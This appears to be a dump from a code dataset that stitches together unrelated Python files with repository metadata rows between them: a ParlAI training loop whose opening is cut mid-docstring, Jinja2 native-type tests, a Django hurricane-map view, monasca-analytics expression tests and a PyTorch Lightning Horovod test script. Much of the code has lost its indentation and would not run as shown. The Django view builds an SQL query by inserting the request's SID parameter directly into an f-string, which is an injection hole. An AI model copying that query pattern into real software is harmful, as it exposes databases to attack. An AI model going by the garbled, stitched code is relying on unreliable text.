python -m parlai.scripts.train_model -m seq2seq -t babi:Task10k:1 -mf '/tmp/model' -bs 32 -lr 0.5 -hs 128
python -m parlai.scripts.train_model -m drqa -t babi:Task10k:1 -mf /tmp/model -bs 10
""" # noqa: E501
# TODO List:
# * More logging (e.g. to files), make things prettier.
import json
import numpy as np
import os
import signal
from parlai.core.metrics import Metric
from parlai.core.agents import create_agent, create_agent_from_shared
from parlai.core.exceptions import StopTrainException
from parlai.core.logs import TensorboardLogger
from parlai.core.metrics import aggregate_named_reports, aggregate_unnamed_reports
from parlai.core.params import ParlaiParser, print_announcements
from parlai.core.worlds import create_task
from parlai.scripts.build_dict import build_dict, setup_args as setup_dict_args
from parlai.utils.distributed import (
sync_object,
is_primary_worker,
all_gather_list,
is_distributed,
num_workers,
)
from parlai.utils.misc import Timer, nice_report
def setup_args(parser=None) -> ParlaiParser:
"""
Build the ParlAI parser, adding command line args if necessary.
:param ParlaiParser parser:
Preexisting parser to append options to. Will be created if needed.
:returns:
the ParlaiParser with CLI options added.
"""
if parser is None:
parser = ParlaiParser(True, True, 'Train a model')
train = parser.add_argument_group('Training Loop Arguments')
train.add_argument(
'-et',
'--evaltask',
help='task to use for valid/test (defaults to the one used for training)',
)
train.add_argument(
'--eval-batchsize',
type=int,
hidden=True,
help='Eval time batch size (defaults to same as -bs)',
)
train.add_argument('--display-examples', type='bool', default=False, hidden=True)
train.add_argument('-eps', '--num-epochs', type=float, default=-1)
train.add_argument('-ttim', '--max-train-time', type=float, default=-1)
train.add_argument('-ltim', '--log-every-n-secs', type=float, default=2)
train.add_argument(
'-vtim',
'--validation-every-n-secs',
type=float,
default=-1,
help='Validate every n seconds. Saves model to model_file '
'(if set) whenever best val metric is found',
)
train.add_argument(
'-stim',
'--save-every-n-secs',
type=float,
default=-1,
help='Saves the model to model_file.checkpoint after '
'every n seconds (default -1, never).',
)
train.add_argument(
'-sval',
'--save-after-valid',
type='bool',
default=False,
help='Saves the model to model_file.checkpoint after '
'every validation (default %(default)s).',
)
train.add_argument(
'-veps',
'--validation-every-n-epochs',
type=float,
default=-1,
help='Validate every n epochs. Saves model to model_file '
'(if set) whenever best val metric is found',
)
train.add_argument(
'-vme',
'--validation-max-exs',
type=int,
default=-1,
hidden=True,
help='max examples to use during validation (default -1 uses all)',
)
train.add_argument(
'--short-final-eval',
default=False,
hidden=True,
type='bool',
help='If true, obeys --validation-max-exs in the final '
'validation and test evaluations.',
)
train.add_argument(
'-vp',
'--validation-patience',
type=int,
default=10,
help=(
'number of iterations of validation where result'
' does not improve before we stop training'
),
)
train.add_argument(
'-vmt',
'--validation-metric',
default='accuracy',
help='key into report table for selecting best validation',
)
train.add_argument(
'-vmm',
'--validation-metric-mode',
type=str,
choices=['max', 'min'],
help='how to optimize validation metric (max or min)',
)
train.add_argument(
'-vcut',
'--validation-cutoff',
type=float,
default=1.0,
hidden=True,
help='value at which training will stop if exceeded by metric',
)
train.add_argument(
'-lfc',
'--load-from-checkpoint',
type='bool',
default=False,
hidden=True,
help='load model from checkpoint if available',
)
train.add_argument(
'-vshare',
'--validation-share-agent',
default=False,
hidden=True,
help='use a shared copy of the agent for validation. '
'this will eventually default to True, but '
'currently defaults to False.',
)
train.add_argument(
'-mcs',
'--metrics',
type=str,
default='default',
help='list of metrics to show/compute, e.g. all, default,'
'or give a list split by , like '
'ppl,f1,accuracy,hits@1,rouge,bleu'
'the rouge metrics will be computed as rouge-1, rouge-2 and rouge-l',
)
TensorboardLogger.add_cmdline_args(parser)
parser = setup_dict_args(parser)
return parser
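# Illustrative sketch (not part of the original file): building the parser and
# parsing an explicit argument list, assuming the usual argparse-style
# parse_args(list) signature. The model, task and model-file values are
# placeholders chosen for the example.
def _example_setup_args():
    parser = setup_args()
    opt = parser.parse_args(
        ['--model', 'ir_baseline', '--task', 'babi:Task10k:1', '--model-file', '/tmp/model']
    )
    return opt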
def load_eval_worlds(agent, opt, datatype):
"""
Create a new eval world for the agent and the given opt.
Overrides the datatype options for doing this. Handles some magic
overrides of other special options for the training script.
:param Agent agent:
The model being trained.
:param Opt opt:
The global CLI opts.
:param string datatype:
The new datatype.
"""
if not is_primary_worker():
# don't load worlds in workers
# TODO(MW): this block will need to be removed
return None
if 'stream' in opt['datatype']:
datatype += ':stream'
opt = opt.copy()
opt['datatype'] = datatype
if opt.get('evaltask'):
# if a different eval task is specified, use it.
opt['task'] = opt['evaltask']
if opt.get('eval_batchsize'):
# override eval time batchsize
opt['batchsize'] = opt['eval_batchsize']
tasks = opt['task'].split(',')
worlds = []
# possibly load agent
if opt.get('validation_share_agent', False):
valid_agent = create_agent_from_shared(agent.share())
else:
valid_agent = agent
# create worlds
for task in tasks:
task_opt = opt.copy() # copy opt since we edit the task
task_opt['task'] = task
valid_world = create_task(task_opt, valid_agent)
worlds.append(valid_world)
return worlds
def _run_single_eval(opt, valid_world, max_exs):
# run evaluation on a single world
valid_world.reset()
cnt = 0
max_cnt = max_exs if max_exs > 0 else float('inf')
while not valid_world.epoch_done() and cnt < max_cnt:
valid_world.parley()
if cnt == 0 and opt['display_examples']:
print(valid_world.display() + '\n~~')
print(valid_world.report())
cnt = valid_world.report().get('exs') or 0
valid_report = valid_world.report()
valid_world.reset() # make sure world doesn't remember valid data
return valid_report
def run_eval(valid_worlds, opt, datatype, max_exs=-1, write_log=False):
"""
Eval on validation/test data.
:param valid_world:
list of the pre-created validation worlds.
:param opt:
the options that specific the task, eval_task, etc
:param datatype:
the datatype to use, such as "valid" or "test"
:param bool write_log:
specifies to write metrics to file if the model_file is set
:param int max_exs:
limits the number of examples if max_exs > 0
"""
if valid_worlds is None:
# This isn't the primary worker, so we can just skip evaluation
return sync_object(None)
print('[ running eval: ' + datatype + ' ]')
timer = Timer()
reports = []
for v_world in valid_worlds:
task_report = _run_single_eval(opt, v_world, max_exs / len(valid_worlds))
reports.append(task_report)
tasks = [world.getID() for world in valid_worlds]
named_reports = dict(zip(tasks, reports))
report = aggregate_named_reports(named_reports)
metrics = f'{datatype}:{nice_report(report)}'
print(f'[ eval completed in {timer.time():.2f}s ]')
print(metrics)
# write to file
if write_log and opt.get('model_file'):
# Write out metrics
f = open(opt['model_file'] + '.' + datatype, 'a+')
f.write(f'{metrics}\n')
f.close()
return sync_object(report)
class TrainLoop:
"""
TrainLoop contains the core training loop logic.
"""
def __init__(self, opt):
# if python is called from a non-interactive shell, like a bash script,
# it will by-default ignore SIGINTs, and KeyboardInterrupt exceptions are
# not produced. This line brings them back
signal.signal(signal.SIGINT, signal.default_int_handler)
if isinstance(opt, ParlaiParser):
print('[ Deprecated Warning: TrainLoop should be passed opt not Parser ]')
opt = opt.parse_args()
# Possibly load from checkpoint
trainstats_suffix = '.trainstats' # we might load training statistics from here
if (
opt['load_from_checkpoint']
and opt.get('model_file')
and os.path.isfile(opt['model_file'] + '.checkpoint')
):
opt['init_model'] = opt['model_file'] + '.checkpoint'
trainstats_suffix = '.checkpoint.trainstats'
# Possibly build a dictionary (not all models do this).
if not (opt.get('dict_file') or opt.get('model_file')):
raise RuntimeError(
'WARNING: For train_model, please specify either a '
'model_file or dict_file.'
)
if 'dict_file' in opt:
if opt['dict_file'] is None and opt.get('model_file'):
opt['dict_file'] = opt['model_file'] + '.dict'
print("[ building dictionary first... ]")
build_dict(opt, skip_if_built=True)
# Create model and assign it to the specified task
self.agent = create_agent(opt)
self.world = create_task(opt, self.agent)
# set up timers
self.train_time = Timer()
self.validate_time = Timer()
self.log_time = Timer()
self.save_time = Timer()
print('[ training... ]')
self.parleys = 0
self.max_num_epochs = (
opt['num_epochs'] if opt['num_epochs'] > 0 else float('inf')
)
self.max_train_time = (
opt['max_train_time'] if opt['max_train_time'] > 0 else float('inf')
)
self.log_every_n_secs = (
opt['log_every_n_secs'] if opt['log_every_n_secs'] > 0 else float('inf')
)
self.val_every_n_secs = (
opt['validation_every_n_secs']
if opt['validation_every_n_secs'] > 0
else float('inf')
)
self.save_every_n_secs = (
opt['save_every_n_secs'] if opt['save_every_n_secs'] > 0 else float('inf')
)
self.val_every_n_epochs = (
opt['validation_every_n_epochs']
if opt['validation_every_n_epochs'] > 0
else float('inf')
)
# smart defaults for --validation-metric-mode
if opt['validation_metric'] in {'loss', 'ppl', 'mean_rank'}:
opt['validation_metric_mode'] = 'min'
elif opt['validation_metric'] in {'accuracy', 'hits@1', 'hits@5', 'f1', 'bleu'}:
opt['validation_metric_mode'] = 'max'
if opt.get('validation_metric_mode') is None:
opt['validation_metric_mode'] = 'max'
self.last_valid_epoch = 0
self.valid_optim = 1 if opt['validation_metric_mode'] == 'max' else -1
self.valid_reports = []
self.best_valid = None
self.impatience = 0
self.saved = False
self.valid_worlds = None
self.opt = opt
# we may have been preempted, make sure we note that amount
self._preempted_epochs = 0.0
if opt.get('model_file') and os.path.isfile(
opt['model_file'] + trainstats_suffix
):
# looks like we were preempted. make sure we load up our total
# training stats, etc
with open(opt['model_file'] + trainstats_suffix) as ts:
obj = json.load(ts)
self.parleys = obj.get('parleys', 0)
self._preempted_epochs = obj.get('total_epochs', 0)
self.train_time.total = obj.get('train_time', 0)
self.impatience = obj.get('impatience', 0)
self.valid_reports = obj.get('valid_reports', [])
if 'best_valid' in obj:
self.best_valid = obj['best_valid']
else:
# old method
if opt.get('model_file') and os.path.isfile(
opt['model_file'] + '.best_valid'
):
with open(opt['model_file'] + ".best_valid", 'r') as f:
x = f.readline()
self.best_valid = float(x)
if opt['tensorboard_log'] and is_primary_worker():
self.tb_logger = TensorboardLogger(opt)
def save_model(self, suffix=None):
"""
Save the model to disk, possibly with a suffix.
"""
if not is_primary_worker():
# never do IO as a non-primary worker
return
if not self.opt.get('model_file'):
# nothing to save to, just exit
return
fn = self.opt['model_file']
if suffix:
fn += suffix
while True:
# don't ever let a ctrl-c interrupt saving
try:
self.agent.save(fn)
self._save_train_stats(suffix)
break
except KeyboardInterrupt:
pass
def _safe_report(self, report):
return {k: v.value() if isinstance(v, Metric) else v for k, v in report.items()}
def _save_train_stats(self, suffix=None):
fn = self.opt['model_file']
if suffix:
fn += suffix
fn += '.trainstats'
with open(fn, 'w') as f:
json.dump(
{
'parleys': self.parleys,
'train_time': self.train_time.time(),
'total_epochs': (
self._preempted_epochs
+ num_workers() * self.world.get_total_epochs()
),
'impatience': self.impatience,
'valid_reports': [self._safe_report(v) for v in self.valid_reports],
'best_valid': self.best_valid,
},
f,
)
def validate(self):
"""
Perform a validation run, checking whether we should stop training.
:return: boolean indicating whether training should stop
:rtype: bool
"""
opt = self.opt
if self.valid_worlds is None:
# we need to load the world now
self.valid_worlds = load_eval_worlds(self.agent, opt, 'valid')
# run evaluation on valid set
# TODO(MW): replace sync_object with self._sync_metrics. You'll need some
# logic to handle 'validation_max_exs' properly
valid_report = run_eval(
self.valid_worlds, opt, 'valid', opt['validation_max_exs']
)
v = valid_report.copy()
v['train_time'] = self.train_time.time()
self.valid_reports.append(v)
# logging
if opt['tensorboard_log'] and is_primary_worker():
self.tb_logger.log_metrics('valid', self.parleys, valid_report)
# flush on a validation
self.tb_logger.flush()
# saving
if (
opt.get('model_file')
and opt.get('save_after_valid')
and is_primary_worker()
):
print("[ saving model checkpoint: " + opt['model_file'] + ".checkpoint ]")
self.save_model('.checkpoint')
# send valid metrics to agent if the agent wants them
if hasattr(self.agent, 'receive_metrics'):
self.agent.receive_metrics(valid_report)
# check which metric to look at
print('Valid report ', valid_report)
new_valid = valid_report[opt['validation_metric']]
if isinstance(new_valid, Metric):
new_valid = new_valid.value()
# check if this is the best validation so far
if (
self.best_valid is None
or self.valid_optim * new_valid > self.valid_optim * self.best_valid
):
print(
'[ new best {}: {}{} ]'.format(
opt['validation_metric'],
new_valid,
' (previous best was {})'.format(self.best_valid)
if self.best_valid is not None
else '',
)
)
self.best_valid = new_valid
self.impatience = 0
if opt.get('model_file') and is_primary_worker():
print("[ saving best valid model: " + opt['model_file'] + " ]")
self.save_model()
self.saved = True
if (
opt['validation_metric'] == 'accuracy'
and self.best_valid >= opt['validation_cutoff']
):
print('[ task solved! stopping. ]')
return True
else:
self.impatience += 1
print(
'[ did not beat best {}: {} impatience: {} ]'.format(
opt['validation_metric'], round(self.best_valid, 4), self.impatience
)
)
self.validate_time.reset()
# check if we are out of patience
if (
opt['validation_patience'] > 0
and self.impatience >= opt['validation_patience']
):
print('[ ran out of patience! stopping training. ]')
return True
return False
def _sync_metrics(self, metrics):
"""
Sync training metrics across workers.
A handful of special cases are handled as exceptions, and the remaining metrics
are simply averaged across workers.
"""
if not is_distributed():
# nothing special needed
return metrics
all_versions = all_gather_list(metrics)
return aggregate_unnamed_reports(all_versions)
def _compute_eta(self, epochs_completed, time_elapsed):
"""
Compute the estimated seconds remaining in training.
:param float epochs_completed: number of epochs already completed.
:param float time_elapsed: total time spent already, in seconds.
:return: ETA in seconds, or None if not computable
"""
# start off with no estimate
eta = None
# Determine time_left and num_epochs
max_epochs = self.opt.get('num_epochs', 0)
if max_epochs > 0 and epochs_completed > 0:
epoch_progress = epochs_completed / max_epochs
eta = (1 - epoch_progress) * time_elapsed / epoch_progress
max_training_time = self.opt.get('max_training_time', -1)
if max_training_time > 0:
time_left = max_training_time - time_elapsed
if eta is None or time_left < eta:
eta = time_left
return eta
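    # Worked example of the ETA arithmetic above (illustrative numbers only):
    # with num_epochs=10, epochs_completed=2 and time_elapsed=600s,
    # epoch_progress = 0.2 and eta = (1 - 0.2) * 600 / 0.2 = 2400s; a
    # max-training-time bound of 1800s would tighten this to 1800 - 600 = 1200s.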
def log(self):
"""
Output a training log entry.
"""
opt = self.opt
if opt['display_examples']:
print(self.world.display() + '\n~~')
logs = []
# get report
train_report = self.world.report()
train_report = self._sync_metrics(train_report)
self.world.reset_metrics()
# time elapsed
logs.append('time:{}s'.format(np.floor(self.train_time.time())))
logs.append('total_exs:{}'.format(self._total_exs))
if self._total_epochs >= 0:
                # log epoch progress whenever it is being tracked
logs.append('epochs:{}'.format(round(self._total_epochs, 2)))
time_left = self._compute_eta(self._total_epochs, self.train_time.time())
if time_left is not None:
logs.append('time_left:{}s'.format(max(0, np.ceil(time_left))))
log = '[ {} ] {}'.format(' '.join(logs), nice_report(train_report))
print(log)
self.log_time.reset()
if opt['tensorboard_log'] and is_primary_worker():
self.tb_logger.log_metrics('train', self.parleys, train_report)
def train(self):
"""
Perform a training run.
:return: tuple of reports (validation_report, test_report)
"""
opt = self.opt
world = self.world
with world:
while True:
# do one example / batch of examples
try:
world.parley()
except StopTrainException:
if is_distributed():
raise RuntimeError(
"StopTrainException not supported for " "distributed mode"
)
break
self.parleys += 1
# get the total training examples done, compute epochs
self._total_epochs = (
self._preempted_epochs
+ num_workers() * self.world.get_total_epochs()
)
exs_per_epoch = self.world.num_examples()
self._total_exs = int(np.round(self._total_epochs * exs_per_epoch))
# and use the primary worker's timings for everything
train_time, log_time, validate_time = sync_object(
(
self.train_time.time(),
self.log_time.time(),
self.validate_time.time(),
)
)
# check counters and timers
if self._total_epochs >= self.max_num_epochs:
self.log()
print(
'[ num_epochs completed:{} time elapsed:{}s ]'.format(
self.max_num_epochs, train_time
)
)
break
if train_time > self.max_train_time:
print('[ max_train_time elapsed:{}s ]'.format(train_time))
break
if log_time > self.log_every_n_secs:
self.log()
if (
validate_time > self.val_every_n_secs
or self._total_epochs - self.last_valid_epoch
>= self.val_every_n_epochs
):
try:
stop_training = self.validate()
except StopTrainException:
if is_distributed():
raise RuntimeError(
"StopTrainException not "
"supported for distributed mode"
)
break
self.last_valid_epoch = self._total_epochs
if stop_training:
break
if (
self.save_time.time() > self.save_every_n_secs
and opt.get('model_file')
and is_primary_worker()
):
print(
"[ saving model checkpoint: {}.checkpoint".format(
opt['model_file']
)
)
self.save_model('.checkpoint')
self.save_time.reset()
if not self.saved and is_primary_worker():
# save agent
self.save_model()
elif opt.get('model_file'):
# reload best validation model
self.agent = create_agent(opt)
valid_worlds = load_eval_worlds(self.agent, opt, 'valid')
max_exs = opt['validation_max_exs'] if opt.get('short_final_eval') else -1
v_report = run_eval(valid_worlds, opt, 'valid', max_exs, write_log=True)
test_worlds = load_eval_worlds(self.agent, opt, 'test')
t_report = run_eval(test_worlds, opt, 'test', max_exs, write_log=True)
if valid_worlds:
for valid_world in valid_worlds:
valid_world.shutdown()
if test_worlds:
for test_world in test_worlds:
test_world.shutdown()
print_announcements(opt)
return v_report, t_report
if __name__ == '__main__':
TrainLoop(setup_args().parse_args()).train()
print()
| 34.92633
| 107
| 0.563494
|
a98ac5b8d1ef3b14240afa65683e706a885714f5
| 4,485
|
py
|
Python
|
tests/test_nativetypes.py
|
cav71/jinja
|
7cf6ffc4f11b5380865fd31a45572fcf1759c4e5
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_nativetypes.py
|
cav71/jinja
|
7cf6ffc4f11b5380865fd31a45572fcf1759c4e5
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_nativetypes.py
|
cav71/jinja
|
7cf6ffc4f11b5380865fd31a45572fcf1759c4e5
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from jinja2._compat import text_type
from jinja2.exceptions import UndefinedError
from jinja2.nativetypes import NativeEnvironment
from jinja2.runtime import Undefined
@pytest.fixture
def env():
return NativeEnvironment()
class TestNativeEnvironment(object):
def test_is_defined_native_return(self, env):
t = env.from_string('{{ missing is defined }}')
assert not t.render()
def test_undefined_native_return(self, env):
t = env.from_string('{{ missing }}')
assert isinstance(t.render(), Undefined)
def test_adding_undefined_native_return(self, env):
t = env.from_string('{{ 3 + missing }}')
with pytest.raises(UndefinedError):
t.render()
def test_cast_int(self, env):
t = env.from_string("{{ anumber|int }}")
result = t.render(anumber='3')
assert isinstance(result, int)
assert result == 3
def test_list_add(self, env):
t = env.from_string("{{ listone + listtwo }}")
result = t.render(listone=['a', 'b'], listtwo=['c', 'd'])
assert isinstance(result, list)
assert result == ['a', 'b', 'c', 'd']
def test_multi_expression_add(self, env):
t = env.from_string("{{ listone }} + {{ listtwo }}")
result = t.render(listone=['a', 'b'], listtwo=['c', 'd'])
assert not isinstance(result, list)
assert result == "['a', 'b'] + ['c', 'd']"
def test_loops(self, env):
t = env.from_string("{% for x in listone %}{{ x }}{% endfor %}")
result = t.render(listone=['a', 'b', 'c', 'd'])
assert isinstance(result, text_type)
assert result == 'abcd'
def test_loops_with_ints(self, env):
t = env.from_string("{% for x in listone %}{{ x }}{% endfor %}")
result = t.render(listone=[1, 2, 3, 4])
assert isinstance(result, int)
assert result == 1234
def test_loop_look_alike(self, env):
t = env.from_string("{% for x in listone %}{{ x }}{% endfor %}")
result = t.render(listone=[1])
assert isinstance(result, int)
assert result == 1
def test_booleans(self, env):
t = env.from_string("{{ boolval }}")
result = t.render(boolval=True)
assert isinstance(result, bool)
assert result is True
t = env.from_string("{{ boolval }}")
result = t.render(boolval=False)
assert isinstance(result, bool)
assert result is False
t = env.from_string("{{ 1 == 1 }}")
result = t.render()
assert isinstance(result, bool)
assert result is True
t = env.from_string("{{ 2 + 2 == 5 }}")
result = t.render()
assert isinstance(result, bool)
assert result is False
t = env.from_string("{{ None == None }}")
result = t.render()
assert isinstance(result, bool)
assert result is True
t = env.from_string("{{ '' == None }}")
result = t.render()
assert isinstance(result, bool)
assert result is False
def test_variable_dunder(self, env):
t = env.from_string("{{ x.__class__ }}")
result = t.render(x=True)
assert isinstance(result, type)
def test_constant_dunder(self, env):
t = env.from_string("{{ true.__class__ }}")
result = t.render()
assert isinstance(result, type)
def test_constant_dunder_to_string(self, env):
t = env.from_string("{{ true.__class__|string }}")
result = t.render()
assert not isinstance(result, type)
assert result in ["<type 'bool'>", "<class 'bool'>"]
def test_string_literal_var(self, env):
t = env.from_string("[{{ 'all' }}]")
result = t.render()
assert isinstance(result, text_type)
assert result == "[all]"
def test_string_top_level(self, env):
t = env.from_string("'Jinja'")
result = t.render()
assert result == 'Jinja'
def test_tuple_of_variable_strings(self, env):
t = env.from_string("'{{ a }}', 'data', '{{ b }}', b'{{ c }}'")
result = t.render(a=1, b=2, c="bytes")
assert isinstance(result, tuple)
assert result == ("1", "data", "2", b"bytes")
def test_concat_strings_with_quotes(self, env):
t = env.from_string("--host='{{ host }}' --user \"{{ user }}\"")
result = t.render(host="localhost", user="Jinja")
assert result == "--host='localhost' --user \"Jinja\""
| 33.721805
| 72
| 0.578149
|
2eabfa96a53cbbab64745aa500f8cdab3988405e
| 1,573
|
py
|
Python
|
django/map/hurricane/views.py
|
hammad93/hurricane-viz
|
2578e846e32527281d9870eb8258e00d12489a82
|
[
"MIT"
] | null | null | null |
django/map/hurricane/views.py
|
hammad93/hurricane-viz
|
2578e846e32527281d9870eb8258e00d12489a82
|
[
"MIT"
] | null | null | null |
django/map/hurricane/views.py
|
hammad93/hurricane-viz
|
2578e846e32527281d9870eb8258e00d12489a82
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
from django.db import connection
from django.shortcuts import render
import json
def index(request):
    # handle query-string requests (e.g. ?type=plot) for plot data
    if request.GET.get('type', False):
        request_type = request.GET['type']
        if request_type == 'plot':
            return HttpResponse(json.dumps(plot(request)))
        else:
            # returning None from a view is an error; answer with 400 instead
            return HttpResponse(status=400)
with connection.cursor() as cursor:
cursor.execute("SELECT SID,SEASON,NUMBER, BASIN, SUBBASIN, NAME, ISO_TIME, NATURE,LAT, LON, WMO_WIND, WMO_PRES, WMO_AGENCY, TRACK_TYPE, DIST2LAND,LANDFALL from hurricanes limit 10")
results = cursor.fetchall()
with connection.cursor() as cursor:
cursor.execute("select distinct SID, NAME, SUBBASIN, YEAR(CAST(ISO_TIME as date)) as YEAR from hurricanes where NAME not in ('', 'NOT_NAMED') order by NAME")
names = cursor.fetchall()
return render(request, 'index.html', {
'hurricanes': results,
'names': names,
})
def plot(request):
with connection.cursor() as cursor:
cursor.execute(f"select SID, NAME, ISO_TIME, LAT, LON, WMO_WIND, WMO_PRES from hurricanes where SID = '{request.GET['SID']}' order by ISO_TIME")
entries = cursor.fetchall()
results = {
'lat' : [],
'lon' : [],
'wind' : [],
'pressure' : []
}
for entry in entries :
results['lat'].append(entry[3])
results['lon'].append(entry[4])
results['wind'].append(entry[5])
results['pressure'].append(entry[6])
return results
| 35.75
| 189
| 0.619835
|
f859010d4531a7765a2d15b263d7fbae29d300d9
| 4,195
|
py
|
Python
|
test/banana/test_api.py
|
daisuke-fujita/monsaca-analytics_20181107
|
5809e66874d76bd9f102e7694197bd849210fa3b
|
[
"Apache-2.0"
] | 1
|
2021-03-19T04:09:04.000Z
|
2021-03-19T04:09:04.000Z
|
test/banana/test_api.py
|
daisuke-fujita/monsaca-analytics_20181107
|
5809e66874d76bd9f102e7694197bd849210fa3b
|
[
"Apache-2.0"
] | 1
|
2019-01-21T09:44:29.000Z
|
2019-01-21T09:44:29.000Z
|
test/banana/test_api.py
|
daisuke-fujita/monsaca-analytics_20181107
|
5809e66874d76bd9f102e7694197bd849210fa3b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from monasca_analytics.exception.banana import BananaEnvironmentError
from monasca_analytics.exception.banana import BananaInvalidExpression
from monasca_analytics.parsing.api import create_fn_with_config
from monasca_analytics.parsing.api import validate_environment
from monasca_analytics.parsing.api import validate_expression
from monasca_analytics.parsing.api import validate_name_binding
from test.util_for_testing import MonanasTestCase
class TestBananaAPI(MonanasTestCase):
def setUp(self):
super(TestBananaAPI, self).setUp()
def tearDown(self):
super(TestBananaAPI, self).tearDown()
def test_validate_expression_is_valid(self):
validate_expression("a + b")
validate_expression("a * b")
validate_expression("a - b")
validate_expression("a / b")
validate_expression("a / b + 12 * (1 - a)")
def test_validate_expression_is_invalid(self):
self.assertRaises(BananaInvalidExpression, validate_expression,
"a123")
self.assertRaises(BananaInvalidExpression, validate_expression,
"a n + 15")
self.assertRaises(BananaInvalidExpression, validate_expression,
"a * exp(b)")
self.assertRaises(BananaInvalidExpression, validate_expression,
"-a")
self.assertRaises(BananaInvalidExpression, validate_expression,
"- a")
self.assertRaises(BananaInvalidExpression, validate_expression,
"+ b")
def test_validate_name_binding_is_valid(self):
validate_name_binding(
validate_expression("a + b * c"),
{"a": "foo", "b": "foo", "c": "bar"}
)
def test_validate_name_binding_is_invalid(self):
self.assertRaises(BananaInvalidExpression,
validate_name_binding,
validate_expression("a + b * c"),
{"a": "foo", "c": "bar"})
def test_validate_environment_is_valid(self):
validate_environment({"a": "foo", "c": "bar"})
def test_validate_environment_is_invalid(self):
self.assertRaises(BananaEnvironmentError,
validate_environment, {"a": 0})
def test_generated_fn_is_valid(self):
fn = create_fn_with_config({"a": "foo", "b": "bar", "c": "toto"},
"a * b + c")
result = fn({"foo": 12, "bar": 2, "toto": -12})
self.assertEqual(result, 12)
result = fn({"foo": 0, "bar": 42, "toto": 13})
self.assertEqual(result, 13)
result = fn({"foo": 2, "bar": 3, "toto": 5})
self.assertEqual(result, 11)
def test_generated_fn_with_parentheses_in_expr1(self):
fn = create_fn_with_config({"a": "foo", "b": "bar", "c": "toto"},
"(a - b) + c")
result = fn({"foo": 12, "bar": 2, "toto": -12})
self.assertEqual(result, -2)
def test_generated_fn_with_parentheses_in_expr2(self):
fn = create_fn_with_config({"a": "foo", "b": "bar", "c": "toto"},
"a - (b + c)")
result = fn({"foo": 12, "bar": 2, "toto": -12})
self.assertEqual(result, 22)
def test_generated_fn_with_no_parentheses_in_expr(self):
fn = create_fn_with_config({"a": "foo", "b": "bar", "c": "toto"},
"a - b + c")
result = fn({"foo": 12, "bar": 2, "toto": 12})
self.assertEqual(result, 22)
| 41.534653
| 75
| 0.615256
|
6679e0edac31c48c41de8f24cc25cb7374ced788
| 3,943
|
py
|
Python
|
tests/models/data/horovod/train_default_model.py
|
pbsds/pytorch-lightning
|
1eff3b53c1ff9d362fc24a1e4fea6c0cfe78696b
|
[
"Apache-2.0"
] | null | null | null |
tests/models/data/horovod/train_default_model.py
|
pbsds/pytorch-lightning
|
1eff3b53c1ff9d362fc24a1e4fea6c0cfe78696b
|
[
"Apache-2.0"
] | null | null | null |
tests/models/data/horovod/train_default_model.py
|
pbsds/pytorch-lightning
|
1eff3b53c1ff9d362fc24a1e4fea6c0cfe78696b
|
[
"Apache-2.0"
] | null | null | null |
"""This script is meant to be executed from `../../test_horovod.py`.
Because Horovod uses a parallel programming model similar to MPI, unit tests for collective
ops like allreduce need to be run in parallel. The most common approach for running parallel
Horovod workers is to launch multiple replicas of the training script via the `horovodrun`
command-line tool:
.. code-block:: bash
horovodrun -np 2 python train_default_model.py ...
Individual test parameters are configured by the serialized `--trainer-options` JSON object.
A non-zero exit code from this script on any rank will indicate failure, while a zero exit code
across all ranks indicates success.
"""
import argparse
import json
import os
import sys
import torch
# this is needed because Conda does not use `PYTHONPATH` env var while pip and virtualenv do
PYTHONPATH = os.getenv("PYTHONPATH", "")
if ":" in PYTHONPATH:
sys.path = PYTHONPATH.split(":") + sys.path
from pytorch_lightning import Trainer # noqa: E402
from pytorch_lightning.callbacks import ModelCheckpoint # noqa: E402
from pytorch_lightning.utilities import _HOROVOD_AVAILABLE # noqa: E402
if _HOROVOD_AVAILABLE:
import horovod.torch as hvd
else:
print("You requested to import Horovod which is missing or not supported for your OS.")
from tests.helpers import BoringModel # noqa: E402
from tests.helpers.utils import reset_seed, set_random_main_port # noqa: E402
parser = argparse.ArgumentParser()
parser.add_argument("--trainer-options", required=True)
parser.add_argument("--on-gpu", action="store_true", default=False)
def run_test_from_config(trainer_options, on_gpu, check_size=True):
"""Trains the default model with the given config."""
set_random_main_port()
reset_seed()
ckpt_path = trainer_options["default_root_dir"]
trainer_options.update(callbacks=[ModelCheckpoint(dirpath=ckpt_path)])
class TestModel(BoringModel):
def on_train_start(self) -> None:
expected_device = torch.device("cuda", self.trainer.local_rank) if on_gpu else torch.device("cpu")
assert self.device == expected_device
def training_epoch_end(self, outputs) -> None:
res = self.trainer.strategy.reduce(torch.tensor(1.0, device=self.device), reduce_op="sum")
assert res.sum() == self.trainer.strategy.world_size
model = TestModel()
trainer = Trainer(**trainer_options)
trainer.fit(model)
assert trainer.state.finished, f"Training failed with {trainer.state}"
trainer.test(model)
assert model.device == torch.device("cpu")
# Horovod should be initialized following training. If not, this will raise an exception.
if check_size:
assert hvd.size() == 2
if trainer.global_rank > 0:
return
# test model loading
pretrained_model = BoringModel.load_from_checkpoint(trainer.checkpoint_callback.best_model_path)
# test new model accuracy
test_loaders = model.test_dataloader()
if not isinstance(test_loaders, list):
test_loaders = [test_loaders]
for dataloader in test_loaders:
batch = next(iter(dataloader))
pretrained_model(batch)
# test HPC saving
# save logger to make sure we get all the metrics
if trainer.logger:
trainer.logger.finalize("finished")
hpc_save_path = trainer._checkpoint_connector.hpc_save_path(ckpt_path)
trainer.save_checkpoint(hpc_save_path)
# test HPC loading
checkpoint_path = trainer._checkpoint_connector._CheckpointConnector__get_max_ckpt_path_from_folder(ckpt_path)
trainer._checkpoint_connector.restore(checkpoint_path)
if on_gpu:
trainer = Trainer(gpus=1, strategy="horovod", max_epochs=1)
# test root gpu index
assert trainer.strategy.root_device.index == hvd.local_rank()
if __name__ == "__main__":
args = parser.parse_args()
run_test_from_config(json.loads(args.trainer_options), args.on_gpu)
| 35.522523
| 114
| 0.737002
|
6786335852c5aa3b95336c148e16ca62444fd15a
| 909
|
py
|
Python
|
